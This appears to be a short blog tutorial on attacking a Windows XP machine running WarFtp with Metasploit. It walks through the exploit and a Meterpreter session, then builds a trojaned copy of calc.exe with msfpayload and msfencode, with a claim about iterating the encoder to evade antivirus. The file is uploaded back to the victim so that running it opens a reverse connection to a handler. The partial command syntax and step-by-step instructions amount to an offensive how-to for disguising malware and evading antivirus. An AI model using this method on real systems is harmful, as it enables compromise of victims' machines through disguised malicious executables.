Crafted fake calculator file
The keys is: msfpayload ... | msfencode ...
Tools :
Attacker (Backtrack 5 R1 Customize, Metasploit)
Victim (Windows XP SP3, WarFtp, Calculator)
Scenario
The victims running the WarFtp Application on the machine so by the application running on the victims target the attacker find the way to exploit the Ftp applications.
- Attacker exploit warftp application in the victim machine---> Meterpreter -----> download calc.exe from the victim machines to rebuild the fake of calculator. Fake calculator is the application result from generate payload and encoding.
- Syntaks msfpayload Lhost= ...... Lport=.......windows/...| msfencode -x /home/calc -o
- The result after generate payloads and encoding is evil executable application
- Sometimes with the 21 iteration can make the evil application bypassing the 42 antivirus with the latest update.
- After Encoding you must upload the evill application to the victim machines.
- The victim run the evill application (fake calculator) so the connection attacker and victims establish.
Lets try...first time open the msfconsole and search the exploit module for warftp.
 | |
| Search exploit |
And then choose one of the exploit
 | |
| Using exploit |
Set the payload
 | |
| Set the Payload |
You can use show option to know the information and option to be setting up. the default port is 4444 and RHOST the ip target. And show the target.
 | |
| show target |
and then set the target and exploit now
 | |
| Set target |
Victim's machine
 | |
| Victims |
If your exploitation succes, you get meterpreter to download and upload the file what you need, in this stage i choose calculator. Download calculator from victim with meterpreter to rebuild the calculator with paylaod and encoder to bypass the AV (Antivirus).
 | |
| download calc.exe |
 | |
| Calculator in the victim |
 |
| After download |
Lets to rebuild fake calculator using msfpayload and msfencode, you must be entrance the value of iteration, the iteration is one of the function msfencode.
 |
| Crafted File |
And then upload to the victim target and exit your metasploit
 | |
| Upload File |
 | |
| After Upload on the Victim |
Lets search and use multi hendler, show the options and set up the LPORT and RHOST...the step by step like the picture.
 |
| Waiting the target |
The meterpreter waiting the victim to execute the calcuator.
| ||
| EvillCalculator |
The victim runing the evil calculator (Fake Calculator)..
Lets see the nc
 | |
| NC |
The Connections establish
0 comments:
Post a Comment